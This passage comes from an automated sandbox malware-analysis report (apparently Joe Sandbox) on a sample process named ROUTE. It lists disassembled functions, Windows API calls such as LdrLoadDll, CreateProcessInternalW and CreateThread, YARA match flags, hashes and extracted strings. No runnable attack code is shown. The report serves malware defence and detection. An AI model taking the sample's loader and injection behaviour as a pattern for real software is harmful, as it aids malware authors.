                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 5498226d04ee123b408a39dd171da59a8acd1e4ffb48960575e4a6dee4069a5b
                                                                                • Instruction ID: d1d95cf98744c16dfa108f9b275b97a5d7e400096a46064d0e8629cbff2d92e5
                                                                                • Opcode Fuzzy Hash: 5498226d04ee123b408a39dd171da59a8acd1e4ffb48960575e4a6dee4069a5b
                                                                                • Instruction Fuzzy Hash: AF90023120240802F500B5989408646004587E1301F55D012A5428565EC76589917135
                                                                                Function 030835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 42cb2cc97bbfdfc51e00850aea1ce313b40a23d24233d1a42dd4986f4ceeebba
                                                                                • Instruction ID: 23ef9a61063a308bbce436620bb6a67a6017882db5b7d95b08112047a281f0cf
                                                                                • Opcode Fuzzy Hash: 42cb2cc97bbfdfc51e00850aea1ce313b40a23d24233d1a42dd4986f4ceeebba
                                                                                • Instruction Fuzzy Hash: 6890023160650802F500B1588514706104587D1201F65C412A0828578D87958A5175A6
                                                                                Function 030839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8ad74eaa729234b97e278285f2263ed299a9584177dc9a01afdc377a03152296
                                                                                • Instruction ID: 346dcd8a9d0636252f38184be384e2c92b3d70d8ea53a32698477f891fd6c6bf
                                                                                • Opcode Fuzzy Hash: 8ad74eaa729234b97e278285f2263ed299a9584177dc9a01afdc377a03152296
                                                                                • Instruction Fuzzy Hash: 9090022124645502F550B15C84046164045A7E1201F55C022A0C185A4D865589557225
                                                                                Function 02830DC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • PostThreadMessageW.USER32(-4108694,00000111,00000000,00000000), ref: 02830E37
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID: -4108694$-4108694
                                                                                • API String ID: 1836367815-789369925
                                                                                • Opcode ID: 921bc606f20d3f0f2e03e4b878ab4354d020b27003acf64135da2f377626372d
                                                                                • Instruction ID: 160b3cea3216e0167bd92cc2f696646bc1c45d91c1f30d48a121ba2520b400fe
                                                                                • Opcode Fuzzy Hash: 921bc606f20d3f0f2e03e4b878ab4354d020b27003acf64135da2f377626372d
                                                                                • Instruction Fuzzy Hash: F90196BAD0121C7AEB11AAE49C81EEFBB7CDF45694F048064FA18B7140D6745E064BF2
                                                                                Function 02843AA0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 02843B7B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: net.dll$wininet.dll
                                                                                • API String ID: 3472027048-1269752229
                                                                                • Opcode ID: 4cc91667ed27a535124eaba8e02b0d47fb98c87d61e01af6f80ed31981894772
                                                                                • Instruction ID: 34c98a16016d31dab77fa1bf715292da15798782467bb44e6473302f3caa5471
                                                                                • Opcode Fuzzy Hash: 4cc91667ed27a535124eaba8e02b0d47fb98c87d61e01af6f80ed31981894772
                                                                                • Instruction Fuzzy Hash: CB3193B9A00209BBD714DFA4CC84FEBBBB9FB84704F108559E51D9B240D774AA44CBA5
                                                                                Function 0283F52F Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeUninitialize
                                                                                • String ID: @J7<
                                                                                • API String ID: 3442037557-2016760708
                                                                                • Opcode ID: 7a03beab84a75b1469b1daf4eb69f1a4a669412261217e290c4517e6c01e4ddc
                                                                                • Instruction ID: ec9b3d76d71ab985621c6e30e6265a6dda7fadbe9ea261335b174a1102052789
                                                                                • Opcode Fuzzy Hash: 7a03beab84a75b1469b1daf4eb69f1a4a669412261217e290c4517e6c01e4ddc
                                                                                • Instruction Fuzzy Hash: C531237AE00609AFDB10DFD8D8809EEB7B9BF48304B108559E615EB214D775EE058BE0
                                                                                Function 0283F530 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeUninitialize
                                                                                • String ID: @J7<
                                                                                • API String ID: 3442037557-2016760708
                                                                                • Opcode ID: 599e94375fd12ecb97e2f4b8d1889a5c76f917e89a0409b6cc35ead2fb38b8ec
                                                                                • Instruction ID: 4dc0adebe24a3705e16779f8effb04ec7006646557667eed4584990bc5686230
                                                                                • Opcode Fuzzy Hash: 599e94375fd12ecb97e2f4b8d1889a5c76f917e89a0409b6cc35ead2fb38b8ec
                                                                                • Instruction Fuzzy Hash: 3F31237AE00609AFDB10DFD8D8809EEB7B9BF48304B104559E605E7214D775EE058BE0
                                                                                Function 028345F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028345E2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID: axD3
                                                                                • API String ID: 2234796835-3556351365
                                                                                • Opcode ID: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                • Instruction ID: 4ca7e4c7bd277047a9e604f748937104e6399a9d1d8a92c5edc54c7ddb5c71f8
                                                                                • Opcode Fuzzy Hash: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                • Instruction Fuzzy Hash: FB1156BE90060A7BE702DFA8CC41B9AB7B89B04618F144228ED19DB281E770D605C7D1
                                                                                Function 02838199 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02831D50,02847FCE,0284568F,02831D13), ref: 02838193
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: a700d42c835ce2977903810198fec52443f9cf3e02a7cad405b17eeed7dfaeee
                                                                                • Instruction ID: b9db71213755c66fb38be3fa0d05de299a5dec28b52fe4d54276d7f6f02316a2
                                                                                • Opcode Fuzzy Hash: a700d42c835ce2977903810198fec52443f9cf3e02a7cad405b17eeed7dfaeee
                                                                                • Instruction Fuzzy Hash: 801106799443087BEB11EBE4CC4AFAA73699B41310F044199F80CEB192FBB595548BE6
                                                                                Function 02834570 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028345E2
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                • Instruction ID: d203624fbf1b19a3f6e070a9902c2fb0ba2c8915e97c2a8a2ba3bf0b03ec8b83
                                                                                • Opcode Fuzzy Hash: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                • Instruction Fuzzy Hash: 9901CCBED4020DABDB14DAE4DC41F9DB7B99B54308F004195A908D7241FA71E7588B92
                                                                                Function 028498E0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,0283832E,00000010,?,?,?,00000044,?,00000010,0283832E,?,00000000,?), ref: 02849943
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInternalProcess
                                                                                • String ID:
                                                                                • API String ID: 2186235152-0
                                                                                • Opcode ID: 671fddae834eef9a986202feb47780fc4726c027dd2d673c94bd21dafe3b195e
                                                                                • Instruction ID: fe344475aef488440bbd9232f9ba5bdae2cd20847270222241607fbf79aae7f5
                                                                                • Opcode Fuzzy Hash: 671fddae834eef9a986202feb47780fc4726c027dd2d673c94bd21dafe3b195e
                                                                                • Instruction Fuzzy Hash: 9B01C4B6204108BBCB44DE8DDC80EDB77ADAF8C714F118208BA0DE7241DA30F8518BA4
                                                                                Function 02829DB0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02829DF5
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: a00885ac3c91a2ed3eecabbd7396b270ed8e90709770fb43edf4f08bfa2c8301
                                                                                • Instruction ID: 69288f315741025624754be96ffcf09bfcbbe901eead4d9f47c1b6d5e3bb5f37
                                                                                • Opcode Fuzzy Hash: a00885ac3c91a2ed3eecabbd7396b270ed8e90709770fb43edf4f08bfa2c8301
                                                                                • Instruction Fuzzy Hash: 09F0307B28021436E22065E99C02F97A29DCB807A1F254466F60CEB180D991B95146E6
                                                                                Function 028383B7 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 0283839C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: d2d9782d338baf92f7f6c86506228d20aff339c068052cd2d406c6ccabd55ddd
                                                                                • Instruction ID: 5f7fa12616f1fd1b930441f72605fd8112668930e6557dab81d9400b32510e07
                                                                                • Opcode Fuzzy Hash: d2d9782d338baf92f7f6c86506228d20aff339c068052cd2d406c6ccabd55ddd
                                                                                • Instruction Fuzzy Hash: 10F0973D2102052BEB12AB38CC86BB27718EB44724F584698F488CB3C3E6B9F40283C0
                                                                                Function 02849800 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000104,?,0284180C,?,?,0284180C,?,00000104,?,00009D57), ref: 0284983C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                • Instruction ID: a475681b8e58fcc897f2725a78a6b96cc5436458fd6282d339b9adeb58fae8e7
                                                                                • Opcode Fuzzy Hash: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                • Instruction Fuzzy Hash: EFE06D796042047BD614EE58DC44F9B77ADDFC8710F004008FA0CA7241DA71B8118BB9
                                                                                Function 02849850 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F845C700,00000007,00000000,00000004,00000000,02833DDB,000000F4), ref: 0284988C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID:
                                                                                • API String ID: 3298025750-0
                                                                                • Opcode ID: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                • Instruction ID: c957fb939e188791154bc6be12c0feb4eadaff3284687cf2eb7fc82b9cc1ce9f
                                                                                • Opcode Fuzzy Hash: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                • Instruction Fuzzy Hash: F9E06DBA2042047BD614EE5CDC45F9B33ADDFC8710F004008FA08A7242D671B8108BB9
                                                                                Function 0283836A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 0283839C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 05fb7c337f53ac48de3ae62af19cb0c17d93f744b11d69e0e8308fd602dbfd3e
                                                                                • Instruction ID: 622a41e83d4fccf90e351a7a3284beb5083886f5e8eb30567f95161934ba9298
                                                                                • Opcode Fuzzy Hash: 05fb7c337f53ac48de3ae62af19cb0c17d93f744b11d69e0e8308fd602dbfd3e
                                                                                • Instruction Fuzzy Hash: D5E0D87D50020527EB207668CC45BA63358AB44764F584664B81CDB2C2E679E55143D0
                                                                                Function 02838370 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 0283839C
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: f9794e067ae3447b555326686bc9826f63314cf8011d7de037bd7b062c62e9e5
                                                                                • Instruction ID: af2db3cb6bb484fcaf01f74278824be505e224c867e82abf57c56e072129376d
                                                                                • Opcode Fuzzy Hash: f9794e067ae3447b555326686bc9826f63314cf8011d7de037bd7b062c62e9e5
                                                                                • Instruction Fuzzy Hash: 58E0267D65020827FF206AA8DC49F6633589B88728F1C4660B81CDB3C1E67CF51182D0
                                                                                Function 02838157 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02831D50,02847FCE,0284568F,02831D13), ref: 02838193
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 5030f345bf0ee70ff83990bab5f9a31eec18b2c10fa2af2b5d8427bb27453d03
                                                                                • Instruction ID: 3df86f744711ecbbdeb993dac0172c28b51c441a897c4b36ef8143804f3172df
                                                                                • Opcode Fuzzy Hash: 5030f345bf0ee70ff83990bab5f9a31eec18b2c10fa2af2b5d8427bb27453d03
                                                                                • Instruction Fuzzy Hash: 8AE0866928438637F741E7F49C0AF5ABB495F42254F1C84E8B94CEB2C3D991D15087E5
                                                                                Function 02838160 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02831D50,02847FCE,0284568F,02831D13), ref: 02838193
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2820000_ROUTE.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 66acfe115b10dd0cdfbbbef63d3d977e36db5f9dd7ea407bfb29fc943c5f1d26
                                                                                • Instruction ID: ecc04d1aee5834b0a0063e5520e1f9c895faee794e8e070000593a5dad28d799
                                                                                • Opcode Fuzzy Hash: 66acfe115b10dd0cdfbbbef63d3d977e36db5f9dd7ea407bfb29fc943c5f1d26
                                                                                • Instruction Fuzzy Hash: BFD05B792403053BF540B6E4CC0AF56724D5740754F148074B50CE72C2DD65F11046E5
                                                                                Function 03082C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 435c5b2fc0c3e1375a0cc8701a37d6501c0e3e94c2bf2de0f4157fb6f82fac46
                                                                                • Instruction ID: b2429b010862b2e6ef175045ecc6e2ca7da5a214bf228c8c8754134fda4f7f27
                                                                                • Opcode Fuzzy Hash: 435c5b2fc0c3e1375a0cc8701a37d6501c0e3e94c2bf2de0f4157fb6f82fac46
                                                                                • Instruction Fuzzy Hash: 69B09B719035C5C5FE51F7604608717794467D1701F19C462D2434655F4739C1D1F175

                                                                                Non-executed Functions

                                                                                Function 02F2DEB9 Relevance: 56.5, Strings: 45, Instructions: 211COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897322722.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2f20000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                • API String ID: 0-3558027158
                                                                                • Opcode ID: 6e578b878be74098917343d695d2a51f32c8d2ed80991d1ede1da86247c354e8
                                                                                • Instruction ID: 112174ae9e98800a3350fe1a9c4ef375084f8baab36bfaf17afc2186c87ec635
                                                                                • Opcode Fuzzy Hash: 6e578b878be74098917343d695d2a51f32c8d2ed80991d1ede1da86247c354e8
                                                                                • Instruction Fuzzy Hash: AF9140F04482948AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89098B95
                                                                                Function 03082890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: cc668c41872b031224bccddead62e50b50f3d194229855a21d99b9d31d89d2e4
                                                                                • Instruction ID: 4c0024bf863a298bf3bd4c580dcc6cfeb1552984f1e720eebbbbbafdb793af1b
                                                                                • Opcode Fuzzy Hash: cc668c41872b031224bccddead62e50b50f3d194229855a21d99b9d31d89d2e4
                                                                                • Instruction Fuzzy Hash: 9851D9B5B02116BFCF20EB98889057EF7FCBB49200B148969E4E5D7641D374DE518BA0
                                                                                Function 030F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_3010000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 78155e90c670b5ba6c7e9d68a96b1ff34ed507fe9df83812c7e036639aae392b
                                                                                • Instruction ID: e545826b0c5d38dda222a763e20230fb4a7388a26462299a130aba462a293092
                                                                                • Opcode Fuzzy Hash: 78155e90c670b5ba6c7e9d68a96b1ff34ed507fe9df83812c7e036639aae392b
                                                                                • Instruction Fuzzy Hash: 8F51277DA05A45AFCB70DF9CC89097FB7FDEB44600B048C9AE695C7A41D7B4EA408760
                                                                                Function 02F23A69 Relevance: 15.1, Strings: 12, Instructions: 74COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897322722.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_2f20000_ROUTE.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ##.`$#&$*$&#*`$&$*o$&;`y$.).=$??#*$a{og$a}a{$o${$|vx}
                                                                                • API String ID: 0-3596917867
                                                                                • Opcode ID: 7a11c76c9737fc9a91b10bddbb426355f46157ad682ba83da3993119e561a5bf
                                                                                • Instruction ID: 4fde93d539cbd01f81ee93c1be10c446e34dd860158936a6660545b4b44c21d4
                                                                                • Opcode Fuzzy Hash: 7a11c76c9737fc9a91b10bddbb426355f46157ad682ba83da3993119e561a5bf
                                                                                • Instruction Fuzzy Hash: 6C3196F081424CDBCF19AF84E5816DEBBB2FF14384F805258EA056F200D7B58A19CB89
                                                                                Function 03077630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 030B4742
                                                                                • Execute=1, xrefs: 030B4713
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 030B4787
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 030B4655
                                                                                • ExecuteOptions, xrefs: 030B46A0
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030B46FC
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 030B4725
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: true
                                                                                • Associated: 00000008.00000002.3897438142.0000000003139000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.000000000313D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
